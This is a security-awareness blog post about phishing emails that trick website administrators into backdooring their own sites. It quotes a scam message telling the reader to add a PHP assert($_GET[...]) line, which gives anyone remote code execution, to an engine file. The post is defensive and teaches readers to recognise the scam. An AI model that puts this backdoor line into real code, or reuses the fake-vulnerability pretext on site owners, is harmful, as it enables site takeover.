Phishing for system administrators
Thursday, June 22, 2017
Office employees are favourite targets for scammers. Indeed, bombarded daily by so much email, they may have a hard time recognising fraudulent messages. But this doesn't imply that attackers aren't interested in other employee categories. Let's take a look at a scam message for system administrators:
Since we really do offer our customers the Internet service Dr.Web AV-Desk, it is quite possible that an email about a similarly named domain could land in one of our mailboxes, describing some sort of problem.
But let's take a closer look. The email is addressed to the marketing department. What does that have to do with matters of site ownership? And instead of requesting a document from us that would confirm our right of ownership, we are prompted to create a file. The file's contents aside, if we had indeed hijacked the site, we could just as easily create the requested file, so it proves nothing about ownership.
As usual, scammers expect panic and turmoil—the deadline is set to three days and not a minute longer. By the way, the message was received on June 2, so all the required steps were to be performed within just one day.
Now let's do a web search to check the phone numbers. It appears that none of them is used by any site registration agency.
It should also be noted that messages of this kind have been circulating across the Web for some time. The trick is that the sender address is valid. And the criminals expect that the targeted users will plant a backdoor in the code of their own site with their own hands. If a site file containing such an assert() call is opened, the code transmitted in the request parameters will be executed.
I checked the address and it turned out that the message was indeed from a registration agency. So I went to do what was being required of me. It took me about ten minutes to create the file and make it available on the website. I was in a hurry to reply to the registration authority—after all, I could lose the domain name. So I pressed Reply to report that the task had been completed and the file was available on my site. Then I sent the message.
Do you think that right then and there I realised that the email was sent by a crook? I did say that I checked the email and it was sent by a registration agency, so I was following the standard routine. And then I received a reply.
We didn't reply to this message. Unfortunately, some people do otherwise.
The task is easy: create a directory containing a file and add one line to the file.
The trick is in asking users to create a file containing seemingly harmless PHP code. However, anyone who reads the description of the assert function will realise that it lets the perpetrators execute whatever code they need.
https://habrahabr.ru/post/265513
https://habrahabr.ru/post/265515
So I deleted the file from my site.
After that I received a reply to the message I had sent in response to the email that instructed me to host a file on my site.
Quotation:
Dear Sir,
The original message you received was sent to you by fraudsters and has nothing to do with R01.
It is not recommended that you deploy the specified code because it will enable attackers to freely alter the contents of your website. If, however, you have already deployed the code, we recommend that you scan your site for malware and/or restore it from a backup made before the code was deployed.
Best regards,
...
There are other phishing tricks geared toward system administrators.
We hereby notify you that our researchers have discovered a critical vulnerability in your website. A flaw in the data-filtering routines can enable attackers to gain access to your site's database.
To close the vulnerability, in a text editor open the file: /engine/engine.php, and at the very top after the line:
<?php>
add:
assert($_GET[REQUEST]);
The Anti-virus Times recommends
Don't switch off your brain when you read emails. You can filter out most phishing emails by using simple logic and checking whether they meet various formal criteria: valid sender address, appropriate salutation, and signature with contact information. Otherwise, you can send money to criminals or (as in this case) roll out a red carpet for them with your own hands.
And, of course, do not forget to use an anti-spam filter, which will protect you from unsolicited emails, scams, and encryption ransomware.